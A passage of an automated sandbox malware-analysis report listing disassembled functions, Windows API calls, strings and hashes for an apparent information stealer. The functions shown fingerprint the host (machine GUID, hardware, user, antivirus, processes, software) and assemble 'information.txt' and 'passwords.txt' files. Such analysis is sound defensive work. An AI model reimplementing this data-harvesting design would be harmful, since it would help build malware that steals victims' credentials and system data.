                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FC38: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042654E), ref: 0040FC46
                                                                                      • Part of subcall function 0040FC38: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC4D
                                                                                      • Part of subcall function 0040FC38: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC59
                                                                                      • Part of subcall function 0040FC38: wsprintfA.USER32 ref: 0040FC84
                                                                                      • Part of subcall function 00410415: memset.MSVCRT ref: 0041043B
                                                                                      • Part of subcall function 00410415: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NeB,?,?,00000000), ref: 00410457
                                                                                      • Part of subcall function 00410415: RegQueryValueExA.KERNEL32(NeB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                      • Part of subcall function 00410415: CharToOemA.USER32(?,?), ref: 00410493
                                                                                      • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                      • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                      • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                      • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                      • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00426600,00000000,?,00000000,00000000,?,HWID: ,00000000,?,004265F4,00000000), ref: 00414922
                                                                                      • Part of subcall function 00411001: OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                      • Part of subcall function 00411001: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                      • Part of subcall function 00411001: CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                      • Part of subcall function 0041064B: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                      • Part of subcall function 0041064B: HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                      • Part of subcall function 0041077C: _EH_prolog.MSVCRT ref: 00410781
                                                                                      • Part of subcall function 0041077C: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                      • Part of subcall function 0041077C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                      • Part of subcall function 0041077C: CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?), ref: 004107C4
                                                                                      • Part of subcall function 0041077C: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                      • Part of subcall function 0041077C: VariantInit.OLEAUT32(?), ref: 00410855
                                                                                      • Part of subcall function 00410925: _EH_prolog.MSVCRT ref: 0041092A
                                                                                      • Part of subcall function 00410925: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?,00000000), ref: 00410942
                                                                                      • Part of subcall function 00410925: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                      • Part of subcall function 00410925: CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?), ref: 0041096D
                                                                                      • Part of subcall function 00410925: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                      • Part of subcall function 00410925: VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                      • Part of subcall function 0040FBFD: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000), ref: 0040FC09
                                                                                      • Part of subcall function 0040FBFD: HeapAlloc.KERNEL32(00000000,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC10
                                                                                      • Part of subcall function 0040FBFD: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC24
                                                                                      • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                      • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                      • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                      • Part of subcall function 004103A0: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                                      • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                                      • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                                      • Part of subcall function 004103A0: ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                                      • Part of subcall function 004103A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?), ref: 004103E2
                                                                                      • Part of subcall function 004103A0: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?,00000000), ref: 004103E9
                                                                                      • Part of subcall function 004103A0: wsprintfA.USER32 ref: 004103FB
                                                                                      • Part of subcall function 0040FCE5: _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                      • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD1C
                                                                                      • Part of subcall function 0040FCE5: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                      • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                      • Part of subcall function 0040FCE5: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                      • Part of subcall function 0040FCE5: LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                      • Part of subcall function 0040FC92: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                      • Part of subcall function 0040FC92: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                      • Part of subcall function 0040FC92: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                      • Part of subcall function 0040FC92: wsprintfA.USER32 ref: 0040FCD7
                                                                                      • Part of subcall function 0040FE18: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4), ref: 0040FE2C
                                                                                      • Part of subcall function 0040FE18: HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4,00000000,?), ref: 0040FE33
                                                                                      • Part of subcall function 0040FE18: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                      • Part of subcall function 0040FE18: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                      • Part of subcall function 0040FEB4: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF07
                                                                                      • Part of subcall function 0040FEB4: wsprintfA.USER32 ref: 0040FF4D
                                                                                      • Part of subcall function 0040FE81: GetSystemInfo.KERNEL32(00000000), ref: 0040FE8E
                                                                                      • Part of subcall function 0040FE81: wsprintfA.USER32 ref: 0040FEA3
                                                                                      • Part of subcall function 0040FF81: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 0040FF8F
                                                                                      • Part of subcall function 0040FF81: HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                      • Part of subcall function 0040FF81: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                      • Part of subcall function 0040FF81: wsprintfA.USER32 ref: 0040FFDC
                                                                                      • Part of subcall function 0040FFEA: _EH_prolog.MSVCRT ref: 0040FFEF
                                                                                      • Part of subcall function 0040FFEA: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410057
                                                                                      • Part of subcall function 004102C3: _EH_prolog.MSVCRT ref: 004102C8
                                                                                      • Part of subcall function 004102C3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                      • Part of subcall function 004102C3: Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                      • Part of subcall function 004102C3: Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                      • Part of subcall function 004102C3: CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                      • Part of subcall function 00410071: _EH_prolog.MSVCRT ref: 00410076
                                                                                      • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 004100BE
                                                                                      • Part of subcall function 00410071: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                      • Part of subcall function 00410071: wsprintfA.USER32 ref: 00410132
                                                                                      • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                      • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                      • Part of subcall function 00410071: lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                      • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 0041020E
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00426748,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00426738), ref: 0041537A
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                    • API String ID: 722754166-3257470747
                                                                                    • Opcode ID: 4b9fd54f7e51e5b3625fb3809e0446a4ef10545269b0a6af337ebca9e7ba9020
                                                                                    • Instruction ID: 15cc8dd7e761a7b9687d1197911a175701b94bd7e601d052700fcacce4104c59
                                                                                    • Opcode Fuzzy Hash: 4b9fd54f7e51e5b3625fb3809e0446a4ef10545269b0a6af337ebca9e7ba9020
                                                                                    • Instruction Fuzzy Hash: 53922EB190424DE9CB15E7E1C952BEEBB789F24308F5001BEE505725C2DE782B8CCAB5
                                                                                    Function 0040C27B Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 296stringmemoryfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C280
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BA4,?,?,?,00425B9E,?,00000000), ref: 0040C378
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
                                                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C487
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
                                                                                    • lstrcat.KERNEL32(00000000,00425BA8), ref: 0040C4A7
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
                                                                                    • lstrcat.KERNEL32(00000000,00425BAC), ref: 0040C4C7
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C4D6
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
                                                                                    • lstrcat.KERNEL32(00000000,00425BB0), ref: 0040C4F6
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C505
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
                                                                                    • lstrcat.KERNEL32(00000000,00425BB4), ref: 0040C525
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C534
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
                                                                                    • lstrcat.KERNEL32(00000000,00425BB8), ref: 0040C554
                                                                                    • lstrcat.KERNEL32(00000000,00425BBC), ref: 0040C562
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040C596
                                                                                    • memset.MSVCRT ref: 0040C5E9
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C616
                                                                                      • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                      • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                      • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                      • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                    • String ID: passwords.txt
                                                                                    • API String ID: 3298853120-347816968
                                                                                    • Opcode ID: b59979e0928ef6e5aefeb439e8188f89191dca433fd258269f78d84d3eaa090d
                                                                                    • Instruction ID: 3d2456610e152fb8fa5d54acb3feaddce6e398d7491f6e002fa618601dbd43d1
                                                                                    • Opcode Fuzzy Hash: b59979e0928ef6e5aefeb439e8188f89191dca433fd258269f78d84d3eaa090d
                                                                                    • Instruction Fuzzy Hash: 00C16971800159EEDB15EBE4DD1AEEEBB75BF18304F10407AF512B21E1DB782A09DB25
                                                                                    Function 0041390C Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 825sleepCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2048 41390c-4139c5 _EH_prolog call 4135ac call 40f997 * 3 call 40f923 * 6 2069 4139c9-4139d0 call 402283 2048->2069 2072 413a64-413ae5 call 4020f9 call 402113 call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2069->2072 2073 4139d6-413a5f call 4020f9 call 40f9e1 call 40f98e call 40212d call 40f95a call 4010b1 call 41303a call 40f9e1 2069->2073 2102 413b50-413b66 call 40fb4d StrCmpCA 2072->2102 2103 413ae7-413b29 call 40212d call 40f95a call 4010b1 call 41303a 2072->2103 2110 413b47-413b4b call 40f98e 2073->2110 2111 41435b-4143ba call 40f9e1 call 40212d call 40f9e1 call 40f98e call 402286 call 40f9e1 call 40f98e call 4132d9 2102->2111 2112 413b6c-413b73 call 40227f 2102->2112 2132 413b2e-413b41 call 40f9e1 2103->2132 2110->2102 2208 4143bf-414436 call 40f98e * 6 call 413295 call 401061 2111->2208 2122 413b79-413b80 call 402283 2112->2122 2123 413cfd-413d13 call 40fb4d StrCmpCA 2112->2123 2134 413c11-413c92 call 402147 call 402161 call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2122->2134 2135 413b86-413c0c call 402147 call 40f9e1 call 40f98e call 40217b call 402147 call 4010b1 call 41303a call 40f9e1 2122->2135 2136 414316-414356 call 40f9e1 call 40217b call 40f9e1 call 40f98e call 4022a0 2123->2136 2137 413d19-413d20 call 402283 2123->2137 2132->2110 2134->2123 2256 413c94-413cee call 40217b call 40f95a call 4010b1 call 41303a call 40f9e1 2134->2256 2281 413cf4-413cf8 call 40f98e 2135->2281 2216 414266-41428a call 40f9e1 call 40f98e call 4132d9 2136->2216 2154 413d26-413d2d call 402283 2137->2154 2155 413eaa-413ec0 call 40fb4d StrCmpCA 2137->2155 2171 413d33-413db9 call 402195 call 40f9e1 call 40f98e call 4021c9 call 402195 call 4010b1 call 41303a call 40f9e1 2154->2171 2172 413dbe-413e3f call 402195 call 4021af call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2154->2172 2173 4142d1-414311 call 40f9e1 call 4021c9 call 40f9e1 call 40f98e call 4022ba 2155->2173 2174 413ec6-413ecd call 402283 2155->2174 2345 413ea1-413ea5 call 40f98e 2171->2345 2172->2155 2324 413e41-413e9b call 4021c9 call 40f95a call 4010b1 call 41303a call 40f9e1 2172->2324 2173->2216 2196 413ed3-413eda call 402283 2174->2196 2197 414057-41406d call 40fb4d StrCmpCA 2174->2197 2221 413ee0-413f66 call 4021e3 call 40f9e1 call 40f98e call 402217 call 4021e3 call 4010b1 call 41303a call 40f9e1 2196->2221 2222 413f6b-413fec call 4021e3 call 4021fd call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2196->2222 2223 414073-41407a call 402283 2197->2223 2224 41428f-4142cf call 40f9e1 call 402217 call 40f9e1 call 40f98e call 4022d4 2197->2224 2216->2208 2387 41404e-414052 call 40f98e 2221->2387 2222->2197 2374 413fee-414048 call 402217 call 40f95a call 4010b1 call 41303a call 40f9e1 2222->2374 2260 414080-414087 call 402283 2223->2260 2261 4141fe-414214 call 40fb4d StrCmpCA 2223->2261 2224->2216 2256->2281 2292 414118-414199 call 402231 call 40224b call 4010b1 call 413118 call 40f9e1 call 40f98e call 40fb4d StrCmpCA 2260->2292 2293 41408d-414113 call 402231 call 40f9e1 call 40f98e call 402265 call 402231 call 4010b1 call 41303a call 40f9e1 2260->2293 2294 414226-414262 call 40f9e1 call 402265 call 40f9e1 call 40f98e call 4022ee 2261->2294 2295 414216-414221 Sleep 2261->2295 2281->2123 2292->2261 2401 41419b-4141f2 call 402265 call 40f95a call 4010b1 call 41303a call 40f9e1 2292->2401 2409 4141f5-4141f9 call 40f98e 2293->2409 2294->2216 2295->2069 2324->2345 2345->2155 2374->2387 2387->2197 2401->2409 2409->2261
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00413911
                                                                                      • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413ADD
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0041303A: _EH_prolog.MSVCRT ref: 0041303F
                                                                                      • Part of subcall function 0041303A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C8A
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D0B
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E37
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413EB8
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413FE4
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414065
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414191
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041420C
                                                                                    • Sleep.KERNEL32(0000EA60), ref: 0041421B
                                                                                      • Part of subcall function 00413118: _EH_prolog.MSVCRT ref: 0041311D
                                                                                      • Part of subcall function 00413118: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                      • Part of subcall function 00413118: StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                    • String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 1345713276-3681523784
                                                                                    • Opcode ID: 8d9ac18b8df2a6b284955ed97a086bcb1f821ef7b8b64bcd58f2fc5db10276e4
                                                                                    • Instruction ID: 81b84598b74079d87ef3f85c7997e73a576bc14dc27035db183a239247f2f400
                                                                                    • Opcode Fuzzy Hash: 8d9ac18b8df2a6b284955ed97a086bcb1f821ef7b8b64bcd58f2fc5db10276e4
                                                                                    • Instruction Fuzzy Hash: D5626370904248EADB10EBE5C956BDEBBB89F19308F5041BEF445B32C1DB785B4C8B66
                                                                                    Function 00403AF5 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513networkstringfileCOMMON
                                                                                    Download Yara Rule

